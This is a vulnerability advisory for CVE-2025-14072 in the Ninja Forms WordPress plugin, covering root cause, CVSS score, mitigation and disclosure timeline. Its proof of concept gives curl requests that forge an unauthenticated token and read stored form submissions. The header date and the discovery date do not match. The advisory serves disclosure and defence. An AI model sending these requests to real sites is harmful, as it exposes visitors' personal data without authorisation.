Unauthenticated Token Generation and Submission Disclosure in Ninja Forms < 3.13.3

Name              Unauthenticated Token Forging and Data Exposure
Systems Affected  WordPress - Ninja Forms < 3.13.3 
Severity          High 7.5/10
Impact            CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Vendor            https://wordpress.org/plugins/ninja-forms/
Advisory          https://www.ush.it/team/ush/hack-ninja-forms/token-ninja-forms-3.13.3.txt
Authors           Marco Lunardi
Date              20251016

I. BACKGROUND

Ninja Forms is one of the most widely used WordPress form builders,
installed on hundreds of thousands of websites globally. The plugin
allows administrators to create contact forms, collect submissions and
manage user-provided data from within the WordPress dashboard.

II. DESCRIPTION

A critical vulnerability has been identified in Ninja Forms version
< 3.13.3  which allows unauthenticated attackers to generate valid access
tokens for arbitrary form IDs. These tokens are issued via a publicly
accessible REST API endpoint designed to refresh authentication tokens.

The endpoint responsible for token generation performs no user
authentication, capability check, or nonce validation, meaning any
remote user can request and obtain a valid token. The issued token is
then accepted by further REST API endpoints that expose form submission
data.

As a result, any unauthenticated attacker can enumerate form identifiers
and retrieve stored submissions including names, email addresses and any
other personal or sensitive data submitted via affected forms.

This constitutes a severe Broken Access Control condition combined with
sensitive information disclosure.

III. ANALYSIS

Practical confirmed impacts include:

- Complete disclosure of stored form submissions
- Exposure of personal and potentially sensitive user data
- Violation of data protection and privacy obligations
- Risk of GDPR non-compliance for EU-based website owners

Proof of Concept

1. Create a form and note the Form ID (ex: 1)
2. Submit an entry.
3. Generate a valid token without authentication:

curl -X POST "http://example.com/?rest_route=/ninja-forms-views/token/refresh"  -d "formIds[]=1"

Example output:

{"token": "<TOKEN>", "publicKey": "...", "expiresIn": 900, "formIds": [1]}

4. Use the token to read all submissions:

curl "http://example/com/?rest_route=/ninja-forms-views/forms/1/submissions" -H "X-NinjaFormsViews-Auth: <TOKEN>"

Example output:

{"1": "Alice", "2": "alice@example.com", "3": "Test message"}

This confirms complete disclosure of all form data.

IV. WORKAROUND

Confirmed affected:

- Ninja Forms < 3.13.3 

Earlier versions may also be affected but were not tested.

V. CVSS 3.1

CVSS Base Score: 7.5 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

VI. ROOT CAUSE

The REST endpoint responsible for generating access tokens does not
enforce any authentication or authorization controls, allowing anonymous
users to request valid tokens. These tokens are subsequently trusted by
other endpoints handling submission data access.

VII. MITIGATION

Website administrators should:

- Update Ninja Forms to the latest available version
- Revoke any previously issued access tokens
- Audit access logs for suspicious submission access activities

VI. CVE INFORMATION

CVE-2025-14072 has been officially published.

https://www.cve.org/CVERecord?id=CVE-2025-14072

VII. DISCLOSURE TIMELINE

20251116 Vulnerability discovered
20251117 Issue reported to WPScan
20251204 WPScan reviews the vulnerability
20251204 WPScan confirms the vulnerability and assigns CVE-2025-14072
20251208 Vendor releases updated Ninja Forms version 3.13.3 containing the fix

VIII. CREDIT

This vulnerability was discovered by Marco Lunardi with contributions by
Francesco "ascii" Ongaro and Pasquale "sid" Fiorillo.

IX. LEGAL NOTICE

Copyright (c) 2026 Marco Lunardi

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.